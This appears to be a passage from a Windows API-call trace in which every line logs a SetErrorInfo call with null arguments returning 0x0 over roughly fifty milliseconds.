[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.013] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.041] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.042] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.043] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.044] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.045] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.046] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.047] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.048] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.050] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
